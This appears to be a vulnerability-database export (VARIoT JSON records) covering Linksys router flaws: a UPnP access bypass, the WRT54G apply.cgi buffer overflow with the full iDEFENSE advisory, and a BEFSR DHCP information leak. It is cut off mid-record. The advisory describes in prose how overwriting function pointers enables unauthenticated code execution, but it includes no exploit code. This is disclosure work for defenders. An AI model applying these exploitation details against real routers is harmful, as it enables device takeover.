"id": "46538",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"id": "VAR-200605-0265",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
}
],
"trust": 1.5451049
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
}
]
},
"last_update_date": "2024-02-14T23:08:40.203000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://secunia.com/advisories/20161"
},
{
"trust": 2.1,
"url": "http://www.securityview.org/how-does-the-upnp-flaw-works.html"
},
{
"trust": 2.0,
"url": "http://www.securityview.org/dutch-student-finds-a-bug-in-upnp.html"
},
{
"trust": 2.0,
"url": "http://securitytracker.com/id?1016134"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/1909"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26707"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/26707"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/1909"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/servlet/satellite?c=l_download_c2\u0026childpagename=us%2flayout\u0026cid=1115417109974\u0026packedargs=sku%3d1127782957298\u0026pagename=linksys%2fcommon%2fvisitorwrapper"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20161/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"date": "2006-05-24T00:00:00",
"db": "VULHUB",
"id": "VHN-18667"
},
{
"date": "2006-05-23T00:00:00",
"db": "BID",
"id": "87619"
},
{
"date": "2006-05-23T05:09:34",
"db": "PACKETSTORM",
"id": "46538"
},
{
"date": "2006-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"date": "2006-05-24T01:02:00",
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"date": "2017-07-20T00:00:00",
"db": "VULHUB",
"id": "VHN-18667"
},
{
"date": "2006-05-23T00:00:00",
"db": "BID",
"id": "87619"
},
{
"date": "2006-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"date": "2024-02-14T01:17:43.863000",
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless-G Broadband Router UPnP Request Access Control Bypass Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
}
],
"trust": 0.6
}
}
VAR-200509-0223
Vulnerability from variot - Updated: 2023-12-18 13:54Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions before 4.20.7, allows remote attackers to execute arbitrary code via a long HTTP POST request. WRT54G v1.0 is prone to a remote security vulnerability. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts may cause a denial-of-service condition. Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow Vulnerability
iDEFENSE Security Advisory 09.13.05 www.idefense.com/application/poi/display?id=305&type=vulnerabilities September 13, 2005
I. BACKGROUND
The Linksys WRT54G is a combination wireless access point, switch and router. More information is available at the following URL:
http://www.linksys.com/products/product.asp?prid=508
II.
The vulnerability specifically exists in the 'apply.cgi' handler of the httpd running on the internal interfaces, including the by default the wireless interface. This handler is used by the many of the configuration pages to perform the configuration management of the router.
III. This could allow any operation to be performed on the router, including changing passwords and firewall configuration, installation of new firmware with other features, or denial of service. Exploitation of this vulnerability requires that an attacker can connect to the web management port of the router. The httpd is running by default but is only accessible via the LAN ports or the WLAN (wireless LAN). An attacker who can associate via the wireless interface to the network running a vulnerable httpd could send an exploit from a wireless device, and so not require direct physical access to an affected network. Additionally, if the httpd is configured to listen on the WAN (internet) interface, this vulnerability would be exploitable remotely over the internet.
On some versions of the WRT54G firmware the buffer used to store the POST input, 'post_buf', is before a structure in memory containing pointers to the 'mime_handlers' structure, which contains function pointers for handling the various types of input. By overwriting this structure so some function pointers point into post_buf, it is possible to execute arbitrary commands. Overwriting these values with nulls will prevent access to the httpd on the system until the router is restarted. Overwriting these values with 'garbage' values will cause the httpd to crash but it will be restarted by a system monitoring process within 2 minutes, allowing multiple exploitation attempts.
Although authentication checks are performed on access to this page, the
code which reads in the buffer is executed even if authentication fails,
so as to clear the input buffer from the client before returning an error message. This may allow an unauthenticated user to exploit the vulnerability.
IV. DETECTION
iDEFENSE has confirmed the existence of this vulnerability in version 3.01.03 of the firmware of the Linksys WRT54G, and has identified the same code is present in version 3.03.6. All versions prior to 4.20.7 may
be affected.
As this firmware is Open Source, and based on a reference implementation
supplied by the original hardware maker, there may be other affected 3rd
party firmware which use the same or similar code, and are thus also affected.
V. WORKAROUND
In order to mitigate exposure of the internal network to outside attackers, ensure encryption is enabled on the wireless interface. The exact settings to use are dependent on your wireless deployment policies.
VI. VENDOR RESPONSE
This vulnerability is addressed in firmware version 4.20.7 available for download at:
http://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout
&packedargs=c%3DL_Download_C2%26cid%3D1115417109974%26sku%3D112491680264 5 &pagename=Linksys%2FCommon%2FVisitorWrapper
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2799 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
06/07/2005 Initial vendor notification 06/07/2005 Initial vendor response 09/13/2005 Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Greg MacManus of iDEFENSE Labs.
Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp
Free tools, research and upcoming events http://labs.idefense.com
X. LEGAL NOTICES
Copyright (c) 2005 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0223",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "88779"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Greg MacManus",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
},
"cve": "CVE-2005-2799",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14008",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2799",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-138",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14008",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions before 4.20.7, allows remote attackers to execute arbitrary code via a long HTTP POST request. WRT54G v1.0 is prone to a remote security vulnerability. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts may cause a denial-of-service condition. Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow\nVulnerability\n\niDEFENSE Security Advisory 09.13.05\nwww.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities\nSeptember 13, 2005\n\nI. BACKGROUND\n\nThe Linksys WRT54G is a combination wireless access point, switch and\nrouter. More information is available at the following URL:\n\n http://www.linksys.com/products/product.asp?prid=508\n\nII. \n\nThe vulnerability specifically exists in the \u0027apply.cgi\u0027 handler of the \nhttpd running on the internal interfaces, including the by default the \nwireless interface. This handler is used by the many of the\nconfiguration pages to perform the configuration management of the\nrouter. \n\nIII. This could allow any operation to be\nperformed on the router, including changing passwords and firewall\nconfiguration, installation of new firmware with other features, or\ndenial of service. Exploitation of this vulnerability requires that an\nattacker can connect to the web management port of the router. The\nhttpd is running by default but is only accessible via the LAN ports or\nthe WLAN (wireless LAN). An attacker who can associate via the wireless\ninterface to the network running a vulnerable httpd could send an\nexploit from a wireless device, and so not require direct physical\naccess to an affected network. Additionally, if the httpd is configured\nto listen on the WAN (internet) interface, this vulnerability would be\nexploitable remotely over the internet. \n\nOn some versions of the WRT54G firmware the buffer used to store the\nPOST input, \u0027post_buf\u0027, is before a structure in memory containing\npointers to the \u0027mime_handlers\u0027 structure, which contains function\npointers for handling the various types of input. By overwriting this\nstructure so some function pointers point into post_buf, it is possible\nto execute arbitrary commands. Overwriting these values with nulls will\nprevent access to the httpd on the system until the router is\nrestarted. Overwriting these values with \u0027garbage\u0027 values will cause\nthe httpd to crash but it will be restarted by a system monitoring\nprocess within 2 minutes, allowing multiple exploitation attempts. \n\nAlthough authentication checks are performed on access to this page, the\n\ncode which reads in the buffer is executed even if authentication fails,\n\nso as to clear the input buffer from the client before returning an\nerror message. This may allow an unauthenticated user to exploit the \nvulnerability. \n\nIV. DETECTION\n\niDEFENSE has confirmed the existence of this vulnerability in version \n3.01.03 of the firmware of the Linksys WRT54G, and has identified the \nsame code is present in version 3.03.6. All versions prior to 4.20.7 may\n\nbe affected. \n\nAs this firmware is Open Source, and based on a reference implementation\n\nsupplied by the original hardware maker, there may be other affected 3rd\n\nparty firmware which use the same or similar code, and are thus also \naffected. \n\nV. WORKAROUND\n\nIn order to mitigate exposure of the internal network to outside \nattackers, ensure encryption is enabled on the wireless interface. The \nexact settings to use are dependent on your wireless deployment\npolicies. \n\nVI. VENDOR RESPONSE\n\nThis vulnerability is addressed in firmware version 4.20.7 available for\ndownload at:\n\nhttp://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout\n \n\u0026packedargs=c%3DL_Download_C2%26cid%3D1115417109974%26sku%3D112491680264\n5\n \u0026pagename=Linksys%2FCommon%2FVisitorWrapper\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CAN-2005-2799 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n06/07/2005 Initial vendor notification\n06/07/2005 Initial vendor response\n09/13/2005 Coordinated public disclosure\n\nIX. CREDIT\n\nThis vulnerability was discovered by Greg MacManus of iDEFENSE Labs. \n\nGet paid for vulnerability research\nhttp://www.idefense.com/poi/teams/vcp.jsp\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com\n\nX. LEGAL NOTICES\n\nCopyright (c) 2005 iDEFENSE, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically, please\nemail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \nThere are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct, indirect,\nor consequential loss or damage arising from use of, or reliance on,\nthis information",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "PACKETSTORM",
"id": "40042"
}
],
"trust": 1.35
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-14008",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2799",
"trust": 2.1
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION APPLY.CGI BUFFER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "88779",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "40042",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "10028",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16854",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82237",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71354",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-67031",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-14008",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"id": "VAR-200509-0223",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:54:15.426000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026amp;type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/products/product.asp?prid=508"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/poi/teams/vcp.jsp"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/servlet/satellite?childpagename=us%2flayout"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2799"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-15T00:00:00",
"db": "VULHUB",
"id": "VHN-14008"
},
{
"date": "2005-09-15T00:00:00",
"db": "BID",
"id": "88779"
},
{
"date": "2005-09-14T06:59:46",
"db": "PACKETSTORM",
"id": "40042"
},
{
"date": "2005-09-15T20:03:00",
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"date": "2005-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14008"
},
{
"date": "2016-07-06T14:33:00",
"db": "BID",
"id": "88779"
},
{
"date": "2008-09-05T20:52:43.737000",
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G apply.cgi Buffer overflow vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
}
}
VAR-200408-0079
Vulnerability from variot - Updated: 2023-12-18 13:31DHCP on Linksys BEFSR11, BEFSR41, BEFSR81, and BEFSRU31 Cable/DSL Routers, firmware version 1.45.7, does not properly clear previously used buffer contents in a BOOTP reply packet, which allows remote attackers to obtain sensitive information. Linksys has a variety of network equipment product lines.
Multiple Linksys devices have problems processing DHCP messages. Remote attackers can use this vulnerability to obtain sensitive information or conduct denial of service attacks on the device.
The built-in DHCP server of these devices has a security vulnerability. The DHCP server of these devices incorrectly processes BOOTP packets. When returning a BOOTP response, it fills some of the information in the memory into the BOOTP field, so the attacker can gain sensitivity by sniffing network communications. Information can also lead to a denial of service attack on the device by an attacker. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0079",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "befn2ps4",
"scope": "eq",
"trust": 1.9,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr11",
"scope": "eq",
